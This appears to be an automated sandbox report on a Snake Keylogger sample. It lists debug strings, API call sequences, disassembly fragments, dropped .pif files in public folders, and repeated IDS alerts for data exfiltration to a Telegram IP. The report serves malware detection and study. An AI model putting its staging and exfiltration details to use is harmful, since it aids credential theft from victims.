            Source: Binary string: easinvoker.pdb source: EPTMAcgvNZ.exe, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: yihfsboC.pif, 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: esentutl.exe, 0000000B.00000003.1343597918.0000000005650000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000002.1408812461.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000000.1420522255.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr
            Source: Binary string: easinvoker.pdbH source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.00000000217CE000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1347686581.000000002179D000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1355304078.0000000002326000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1252312705.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000001160000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000013.00000002.1534376052.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1582953816.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001C.00000002.1619637523.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1624785769.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif.11.dr
            Source: Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1355379307.0000000005960000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000014.00000002.1533195513.0000000000381000.00000020.00000001.01000000.0000000B.sdmp, xpha.pif.15.dr
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B15908
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_003A0207
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_003A589A
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose,16_2_003B3E66
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_003A4EC1
            Source: C:\Users\Public\alpha.pifCode function: 16_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_0039532E
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,19_2_003A589A
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,19_2_003A0207
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose,19_2_003B3E66
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,19_2_003A4EC1
            Source: C:\Users\Public\alpha.pifCode function: 19_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,19_2_0039532E
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h14_2_2417E158
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 28DFE5E8h14_2_28DFE1C8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_28DFC0F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993A56Dh14_2_2993A1D0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993D975h14_2_2993D5D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993B0FDh14_2_2993AD60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993E505h14_2_2993E168
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993C81Dh14_2_2993C480
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993FC25h14_2_2993F888
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993BC8Dh14_2_2993B8F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993F095h14_2_2993ECF8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993D3ADh14_2_2993D010
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 299303E3h14_2_29930040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993AB35h14_2_2993A798
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993DF3Dh14_2_2993DBA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993EACDh14_2_2993E730
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993B6C5h14_2_2993B328
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993C255h14_2_2993BEB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993F65Dh14_2_2993F2C0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 299309ABh14_2_29930608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2993CDE5h14_2_2993CA48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29951535h14_2_29951198
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995A91Dh14_2_2995A580
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995A355h14_2_29959FB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29950F6Dh14_2_29950BD0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29959795h14_2_299593F8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29959D8Fh14_2_299599E8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29957AADh14_2_29957710
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995B4ADh14_2_2995B110
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 299574BDh14_2_29957120
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995AEE5h14_2_2995AB48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29951AFDh14_2_29951760
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995863Dh14_2_299582A0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995C03Dh14_2_2995BCA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29958075h14_2_29957CD8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995BA75h14_2_2995B6D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 299509A5h14_2_29950608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 299591CDh14_2_29958E30
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 299503DDh14_2_29950040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 29958C05h14_2_29958868
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 2995C605h14_2_2995C268
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_2995501F
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_29955020
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_2995542C
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]14_2_29B5DA65
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]14_2_29B5D630
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h23_2_343DE158
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 36DBE5E8h23_2_36DBE1C8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h23_2_36DBC0F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBDF3Dh23_2_37FBDBA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBAB35h23_2_37FBA798
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBEACDh23_2_37FBE730
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBB6C5h23_2_37FBB328
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBF65Dh23_2_37FBF2C0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBC255h23_2_37FBBEB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBCDE5h23_2_37FBCA48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FB09ABh23_2_37FB0608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBD975h23_2_37FBD5D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBA56Dh23_2_37FBA1D0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBE505h23_2_37FBE168
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBB0FDh23_2_37FBAD60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBF095h23_2_37FBECF8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBBC8Dh23_2_37FBB8F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBFC25h23_2_37FBF888
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBC81Dh23_2_37FBC480
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FB03E3h23_2_37FB0040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FBD3ADh23_2_37FBD010
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD9795h23_2_37FD93F8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD9D8Fh23_2_37FD99E8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD0F6Dh23_2_37FD0BD0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FDA355h23_2_37FD9FB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD1535h23_2_37FD1198
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FDA91Dh23_2_37FDA580
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD1AFDh23_2_37FD1760
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FDAEE5h23_2_37FDAB48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD74BDh23_2_37FD7120
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FDB4ADh23_2_37FDB110
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD7AADh23_2_37FD7710
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FDBA75h23_2_37FDB6D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD8075h23_2_37FD7CD8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FDC03Dh23_2_37FDBCA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD863Dh23_2_37FD82A0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD8C05h23_2_37FD8868
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FDC605h23_2_37FDC268
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD03DDh23_2_37FD0040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD91CDh23_2_37FD8E30
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then jmp 37FD09A5h23_2_37FD0608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_37FD5020
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_37FD5010
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]23_2_381DDA68
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]23_2_381DDA67
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_381D3EFA
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 4x nop then lea esp, dword ptr [ebp-08h]23_2_382CC4F0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49791 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49810 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49742 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49817 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49776 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49813 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49847 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49806 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49846 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49775 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49867 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49811 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49764 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49839 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49793 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49840 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49877 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49855 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49821 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49898 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49825 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49878 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49887 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49836 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49802 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49823 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49854 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49912 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49905 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49922 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49831 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49928 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49786 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49897 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49921 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49832 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49858 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49930 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49920 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49828 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49950 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49943 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49770 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49876 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49942 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49913 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49914 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49970 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49948 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49963 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49979 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49964 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49941 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49985 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49995 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49971 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49927 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49954 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49868 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49956 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:49936 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.7:50018 -> 149.154.167.220:443
